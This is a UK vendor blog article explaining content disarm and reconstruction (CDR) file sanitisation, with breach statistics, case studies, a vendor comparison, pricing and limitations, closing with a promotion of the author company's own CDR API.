Content disarm and reconstruction (CDR): What it is and why your business needs it

What is content disarm and reconstruction?

Content disarm and reconstruction (CDR) is a cybersecurity technology that removes potentially malicious code from files. You'll also hear it called threat extraction, file sanitisation, or data sanitisation, but the idea is the same. CDR takes an incoming file, tears it apart, throws away anything that could be weaponised, and rebuilds a clean version that's safe to open.

Here's the bit that makes it different from everything else: CDR doesn't try to detect malware. It doesn't scan for known threats, check signatures, or watch for suspicious behaviour. It simply removes all file components that aren't explicitly approved by the system's policies and the file format's own specifications.

Think of it like airport security for your files. Rather than trying to identify every possible weapon, CDR effectively disassembles your luggage, checks every item against an approved list, bins anything that shouldn't be there, and repacks a clean bag for you on the other side. The process is thorough, fast, and doesn't rely on anyone recognising the specific threat.

A brief history of CDR

CDR's roots go back to the late 1990s when macro viruses first started causing headaches across corporate networks. Back then, the earliest form of CDR was blunt but effective: antivirus vendors would simply strip all macros from Microsoft Office documents, regardless of whether individual macros were malicious or perfectly legitimate.

Over time, the approach got smarter. Security researchers started figuring out ways to tell safe file components from dangerous ones, and the technology evolved from crude macro-stripping into sophisticated reconstruction engines that can preserve full file functionality while eliminating virtually all exploitable components.

The analyst firm Gartner has since identified CDR as a "high benefit" technology for network infrastructure security, and the tech has gained serious traction in defence, government, and financial services. It's now making its way into the broader business market too - and it's about time.

Three levels of CDR

Not all CDR solutions are created equal. The technology exists at three distinct levels, each offering a different trade-off between security and usability.

Level 3 is where the real magic happens. Rather than just chopping bits out of the original file (which can leave behind structural vulnerabilities), Level 3 CDR creates a brand-new file from a clean template and transfers only the verified safe content across. It's like rebuilding a house from scratch using only the materials that passed inspection, rather than trying to patch up a house that might have hidden problems in the walls.

Advanced Level 3 systems process files in under 200 milliseconds. That's fast enough to sit inline on an email gateway handling thousands of messages per hour without anyone noticing a delay.

Why traditional antivirus isn't enough

Let's be clear: antivirus software still has a place in your security setup. But relying on it as your primary defence against file-based threats is a bit like locking your front door while leaving the windows wide open.

Traditional antivirus works on signature-based detection. It compares incoming files against a database of known malware signatures - specific patterns in code that identify known threats. If there's a match, the file gets blocked. If there isn't, it sails through.

The problem? Attackers know exactly how this works, and they've got very good at getting around it.

The UK threat landscape in numbers

The UK government's Cyber Security Breaches Survey 2025 paints a sobering picture. Over four in ten UK businesses (43%) reported a breach in the past twelve months. For medium-sized firms, that figure jumps to 70%. For large organisations, it's 74%.

And it's getting worse. Ransomware incidence among UK businesses doubled in a single year, jumping from less than 0.5% to 1% - that's an estimated 19,000 organisations affected. The average cost of a data breach for UK organisations now stands at £3.29 million, according to IBM's 2025 Cost of a Data Breach report. In financial services, it's £5.74 million.

File-based attacks are at the heart of this. Around 43% of all malware downloads are now hidden inside Microsoft Office documents - a three-fold increase from 2020. 94% of malware arrives via email. These aren't exotic, sophisticated attacks. They're weaponised Word documents and dodgy PDFs landing in inboxes every single day.

The detection gap

The AV-TEST Institute registers over 450,000 new malicious programmes daily. That's 164 million new malware variants per year. Before any of them can be caught by signature-based antivirus, they need to be discovered, analysed, and added to signature databases. That takes time - often days or weeks - and during that window, the malware spreads freely.

The numbers on this are brutal. Research from VulnCheck found that 28.3% of Known Exploited Vulnerabilities in early 2025 were being actively exploited within just one day of disclosure. Attackers are faster than the patch-and-signature cycle can keep up with.

Evasion is the norm, not the exception

Modern malware actively tries to dodge detection. Polymorphic malware changes its code each time it infects a new system. Metamorphic malware rewrites its own underlying code while keeping its functionality. And in 2025, 82.6% of phishing emails contain AI-generated content, making them more convincing and harder for automated systems to flag.

Research shows that 56% of phishing emails now pass through all existing security layers - antivirus, email gateways, authentication protocols, the lot. 77% of successful ransomware attacks used techniques that bypassed the victim's antivirus entirely. These aren't edge cases. This is the new normal.

Where CDR changes the game

CDR sidesteps the entire detection problem. It doesn't need to know what the malware looks like, because it's not looking for malware at all. It simply removes any file component that could potentially carry a payload - macros, scripts, embedded objects, the lot - regardless of whether those components are actually malicious.

A zero-day exploit hidden in a Word macro? Gone. A never-before-seen script buried in a PDF? Gone. A polymorphic payload stuffed into an OLE object? Also gone. CDR doesn't care how clever or novel the attack is. If it relies on active content to execute, it can't survive the CDR process.

That's the fundamental difference. Antivirus asks "is this file dangerous?" and often gets it wrong. CDR asks "does this file contain anything that could be dangerous?" and removes it, full stop.

How CDR works step by step

CDR follows a structured, five-stage process. Each file goes through every stage, and the whole thing typically completes in under 200 milliseconds. Here's what happens behind the scenes.

What gets stripped, what gets kept

Supported file types

CDR works across all the file types your business is likely to encounter:

• Office documents: Word, Excel, PowerPoint (both modern OOXML and legacy formats), plus OpenDocument formats and RTF
• PDFs: Including form fields, JavaScript removal, and embedded file extraction
• Images: JPEG, PNG, GIF, TIFF, BMP - with steganography detection in advanced systems
• Archives: ZIP, RAR, 7Z, CAB - with recursive extraction of nested archives
• Email: PST, OST, EML, MSG containers and their attachments
• Web content: HTML files with embedded scripts
• Specialised formats: Advanced solutions support 200+ file types including CAD files, medical imaging (DICOM), and industry-specific formats

CDR vs antivirus vs sandboxing vs DLP

If you're weighing up your options for file security, here's how CDR stacks up against the other technologies you'll come across. Each has its strengths, and the best setups use them together. But understanding the differences helps you make smarter decisions about where to invest.

CDR vs antivirus: the detection gap

Research from WatchGuard found that traditional signature-based antivirus misses roughly 30% of malware variants that behavioural detection systems catch. That gap grows wider every year as attackers produce more variants faster. Around two-thirds of all malware seen in the wild is now zero-day, meaning it's never been catalogued. Antivirus can't catch what it's never seen before.

CDR doesn't have this problem. It strips active content from files whether or not that content is known to be malicious. No signatures needed, no database to update, no race against the clock.

CDR vs sandboxing: speed and evasion

Sandboxing opens suspicious files in an isolated virtual environment to watch what they do. It's clever, but it has two major weaknesses. First, it's slow. Sandbox analysis takes 30 seconds to 5 minutes per file, making it impractical for high-volume email gateways or file upload portals.

Second, modern malware knows how to spot a sandbox. Attackers build in checks for virtual machine indicators - CPU core counts, memory configurations, hardware IDs - and simply go dormant if they detect a test environment. Others use time delays, waiting hours or days before activating, long after the sandbox has given the all-clear. Some techniques are remarkably simple: the malware checks the time from multiple system APIs simultaneously, and if the results don't match (because the sandbox is fast-forwarding time), it knows it's being watched.

CDR doesn't need to observe behaviour. It doesn't run the file at all. It just tears it apart, throws away the dangerous bits, and rebuilds it clean. The whole process takes under 20 milliseconds.

CDR vs DLP: different problems, same team

DLP (data loss prevention) and CDR solve completely different problems. CDR stops malicious code from getting in. DLP stops sensitive data from getting out. A file can be squeaky clean from a malware perspective but violate DLP policies because it contains customer credit card numbers being sent somewhere they shouldn't go.

The two technologies complement each other well. CDR at the email gateway sanitises incoming attachments. DLP monitors outgoing files and blocks data that shouldn't leave the organisation. Together, they cover both sides of the file security equation.

The bottom line: layered defence

No single technology stops everything. The strongest security setups layer multiple tools that each handle different parts of the problem. CDR at file ingestion points prevents file-based threats from entering. Antivirus on endpoints catches known threats that arrive through other channels. EDR spots suspicious behaviour if something gets through. DLP prevents sensitive data from leaving. Each layer picks up what the others miss.

If you're starting from scratch, CDR on your email gateway and file upload points is one of the highest-impact investments you can make. It closes the biggest gap in most organisations' file security. For more on building a complete security posture, see our guide to understanding phishing, ransomware, and malware.

Who needs CDR?

The short answer: any business that receives files from external sources. The longer answer depends on your industry, your risk profile, and how you handle files day to day.

Common use cases

• File upload portals: If customers, applicants, or partners upload files to your systems, CDR cleans them before they touch your network
• Email attachments: CDR sits on your email gateway and sanitises attachments before they reach inboxes
• Cloud storage: Files syncing from OneDrive, Google Drive, Dropbox, Teams, or Slack can be cleaned in transit
• Cross-domain transfers: Moving files between security domains (particularly in defence and government) is a textbook CDR use case
• Supplier document exchange: Invoices, contracts, and specifications from external parties are all potential attack vectors
• Browser isolation: CDR integrates with Remote Browser Isolation (RBI) to sanitise files downloaded within isolated browser sessions before they reach user devices

Industries with highest CDR adoption

CDR adoption is strongest in sectors where the consequences of a file-based breach are severe. Here's what that looks like across the UK:

UK regulatory drivers

If you're wondering whether CDR is something your business actually needs or just a nice-to-have, the regulatory landscape is making that question easier to answer:

• Cyber Security and Resilience Bill 2025: Introduced to Parliament in November 2025, this establishes the Cyber Assessment Framework (CAF) as the compliance standard. It significantly expands which organisations fall under regulation, with fines up to £17 million or 4% of global turnover. CDR addresses multiple CAF requirements around proactive threat prevention and "secure by design" principles. Royal Assent is expected during 2026.
• NIS2 directive: If your business serves EU customers or operates within EU supply chains, NIS2 applies regardless of Brexit. It mandates incident reporting within 24 hours and requires technical measures proportionate to risk. CDR directly addresses the requirement to protect against file-based threats from known and unknown attack vectors.
• GDPR Articles 32 and 35: GDPR requires "appropriate technical measures" taking into account the "state of the art." For businesses handling personal data through file transfers, CDR strengthens your position under a Data Protection Impact Assessment. It demonstrates proactive risk mitigation rather than reactive detection.
• NCSC guidance: The National Cyber Security Centre has published extensive guidance on cross-domain solutions and file security, directly relevant for government and defence organisations. Alignment with NCSC standards provides procurement assurance for public sector contracts.

File-based threats don't discriminate by industry, though. If your business is a small accounting firm that processes client spreadsheets, you're just as much a target as a bank - arguably more so, because you likely have weaker defences.

Real-world examples: file-based attacks in the UK

File-based attacks aren't theoretical. UK organisations have been hit hard by attacks that exploited documents, files, and social engineering as the entry point. Here's what happened, and how better document security could have made a difference.

Marks & Spencer (April 2025)

The M&S cyber attack was one of the most damaging incidents to hit a UK retailer. Attackers used social engineering to impersonate an employee and trick a third-party provider into resetting an internal password. Once inside, they deployed DragonForce ransomware, encrypting virtual machines and crippling M&S's online ordering, Click and Collect, and contactless payment systems.

The breach went undetected for two days. By the time M&S leadership spotted it, the attackers had already moved laterally through the network and deployed encryption malware. Customer data including names, birth dates, addresses, phone numbers, and purchase histories was stolen.

Co-op Group (April 2025) - a very different outcome

Just days after M&S, the Co-op was hit by an almost identical attack. Same social engineering tactics, same credential reset manipulation. But the outcome was starkly different.

The Co-op's security operations centre spotted the malicious activity within minutes. Their zero-trust network segmentation meant critical services like online retail and payments were on separate infrastructure, insulated from the breach. Containment actions were underway within hours.

The result? Estimated losses of around £100 million (versus M&S's £300 million), minimal customer-facing disruption, and most customers were unaware the breach had occurred. The lesson: detection speed and network architecture matter far more than having a bigger antivirus budget.

NHS Synnovis (June 2024)

The Qilin ransomware group hit Synnovis, a pathology service provider used by hospitals across London. The attack disrupted virtually all of Synnovis's IT systems, forcing the cancellation of at least 1,500 operations and outpatient appointments at King's College Hospital and Guy's and St Thomas' NHS trusts. That included over 100 cancer treatments and 18 organ transplants.

The attackers claimed to have stolen 400GB of data, including information from over 300 million patient interactions - blood test results, HIV test results, STI diagnoses, and cancer test results. They demanded $50 million in ransom. Services weren't fully restored until December 2024, six months after the attack began.

British Library (October 2023)

Attackers breached the British Library's systems and released stolen data on the dark web, including personal user information. The attack destroyed multiple capabilities simultaneously, requiring a complete rebuild of the entire technology infrastructure - a process that took well over a year. Digital collections and electronic resources remained unavailable long after the initial breach.

Where CDR fits in

Not all of these attacks could have been prevented by CDR alone - social engineering and credential theft require a different set of defences. But CDR would have closed off a major attack vector in several scenarios:

• Spear phishing emails with weaponised attachments would have been stripped of macros and malicious content before reaching inboxes
• File-based lateral movement within compromised networks could have been blocked by CDR on internal file transfer points
• Supply chain file transfers carrying malicious payloads would have been sanitised at the boundary

CDR isn't a silver bullet. But as part of a layered security approach - alongside network segmentation, rapid detection, and proper incident response plans - it removes one of the most common and effective attack vectors before it ever reaches your people. Learn more about building a complete security strategy in our cybersecurity essentials guide for UK SMEs.

Choosing a CDR solution

CDR solutions come in several flavours, and the right choice depends on how your business handles files and what level of integration you need.

Deployment models

UK CDR vendors

The UK market includes both domestic CDR specialists and international providers with strong UK presence:

• Glasswall (UK-based) - The most prominent UK CDR specialist. Government and defence focus, with a strategic investment from PSG Equity in April 2025. Cloud-hosted, SaaS API, hybrid, or fully on-premises deployment options.
• OPSWAT MetaDefender - Mature international platform combining Deep CDR with multiscanning (multiple AV engines simultaneously). Integrates with F5 BIG-IP and Palo Alto Networks. Tested by SE Labs.
• Everfox (formerly Forcepoint Federal) - Cross-domain CDR specialist for defence and intelligence. Available on the G-Cloud framework for public sector procurement. Acquired Garrison Technology in August 2024 for FPGA-based hardware security.
• Menlo Security (acquired Votiro, February 2025) - CDR integrated with browser isolation and secure workspace. The Votiro CDR technology now sits within Menlo's broader security platform.
• Nexor (UK-based) - Cross-domain data transmission with integrated CDR for defence and government use cases. Aligned with UK Strategic Defence Review priorities.
• Check Point Threat Extraction - CDR bundled within Check Point's Next Generation Threat Prevention package. Good fit if you're already running Check Point infrastructure.
• Red Eagle Tech CDR API - Cloud-based, API-first CDR with UK data processing. Designed for straightforward integration into web applications and cloud-native architectures.

What to look for

When evaluating CDR solutions, focus on these criteria:

• CDR level: Level 3 (positive selection with template-based reconstruction) is the gold standard. Lower levels sacrifice usability or leave structural vulnerabilities
• File type coverage: Check the vendor supports all file types your business actually processes
• Processing speed: For inline deployment, sub-second processing is a must
• Policy flexibility: Can you configure different policies for different file sources, types, and destinations?
• Recursive processing: Can the system handle archives within archives? Attackers love nesting malicious files inside multiple layers of compression
• Data residency: For UK businesses handling sensitive data, check where files are processed. UK-based processing avoids data sovereignty concerns
• Integration options: Does it fit your existing infrastructure (email, web apps, file servers)?
• G-Cloud availability: If you're a public sector organisation, check whether the vendor is on the G-Cloud framework for streamlined procurement

CDR limitations: what it can't do

We'd be doing you a disservice if we didn't mention what CDR can't handle. No security technology is perfect, and understanding the gaps helps you build defences that actually work.

• Executable files: CDR can't sanitise .exe or .dll files. These are legitimate software delivery mechanisms, but they can't be rebuilt from clean templates the way documents can. You'll still need separate controls (reputation analysis, sandboxing, endpoint detection) for executables.
• Password-protected files: CDR can't process files it can't decrypt. If someone sends you a password-protected ZIP file, the CDR system needs the password before it can sanitise the contents. Some solutions (like OPSWAT) can retain the password protection on the cleaned file, but there's an operational overhead in getting passwords from senders.
• Legitimate macros: CDR can't reliably distinguish between a malicious macro and a legitimate one your finance team built. Level 3 positive selection systems do the best job of preserving macro functionality, but some legitimate active content may still be removed. Organisations often handle this with exception policies for trusted internal sources.
• File format edge cases: Complex files can occasionally experience minor compatibility issues after CDR processing - font rendering changes, slight image quality shifts, or interactive PDF form fields behaving differently. These issues are uncommon with modern Level 3 systems, but they're worth testing for with your specific file types.
• Non-file attack vectors: CDR only handles file-based threats. It won't stop credential theft, social engineering, or attacks that exploit vulnerabilities in network protocols. It's one piece of the puzzle, not the whole picture.

UK costs and implementation

CDR pricing varies significantly depending on the deployment model, file volume, and vendor. Here's what UK businesses can realistically expect to pay.

Pricing by deployment model

For context, OPSWAT MetaDefender offers entry-level plans from around £1,000 per month, with mid-tier plans at £3,000-5,000 per month for higher file volumes and more features. Everfox's Zero Trust CDR is available on the G-Cloud framework at £165.75 per unit for public sector organisations. Red Eagle Tech's CDR API starts from £50 per month, designed to make file security accessible to businesses of all sizes.

Budget 15-25% of your initial deployment costs annually for ongoing operational expenses - maintenance, software updates, support, and monitoring.

Implementation effort

How long CDR takes to deploy depends entirely on the approach you choose:

API-based deployments are by far the fastest path to production. OPSWAT claims basic MetaDefender setups can be operational within two hours, though that assumes pre-existing API expertise and minimal testing. A more realistic timeline for a proper API integration with testing and error handling is two to six weeks.

For gateway deployments, you're looking at infrastructure procurement, network architecture changes, integration with existing security systems, and extensive testing under realistic load. Plan for three to six months. Cross-domain solutions for defence and government environments, with their hardware-enforced security and assurance requirements, typically need six to twelve months.

The ROI case for CDR

CDR is an investment, so let's talk numbers. The average UK data breach costs £3.29 million. In financial services, it's £5.74 million. The M&S attack in 2025 resulted in estimated losses of £300 million.

For a mid-sized business spending £3,000-10,000 per year on cloud-based CDR, the maths is straightforward. If CDR reduces your expected breach costs by even 20-30% (a conservative estimate given that file-based threats are the dominant attack vector), the risk reduction value runs to £100,000-£400,000 annually. That's a payback period measured in months, not years.

Beyond direct breach cost reduction, CDR delivers indirect savings: reduced incident response costs (organisations with dedicated security controls save an average of $248,000 annually on incident response), avoided regulatory fines under the new Cyber Security and Resilience Bill, and productivity gains from preventing ransomware that would otherwise shut down operations for weeks.

Red Eagle Tech CDR API

We built our CDR API because we saw UK businesses struggling with file security. Most CDR solutions are designed for large enterprises with big budgets and dedicated security teams. We wanted to make the technology accessible to businesses of all sizes.

Our API is cloud-based with UK data processing, so your files never leave the country. Integration takes just a few lines of code, there's no infrastructure to maintain, and it starts from £50 per month. If your business handles file uploads, processes email attachments, or exchanges documents with external parties, it's worth a look.

Frequently asked questions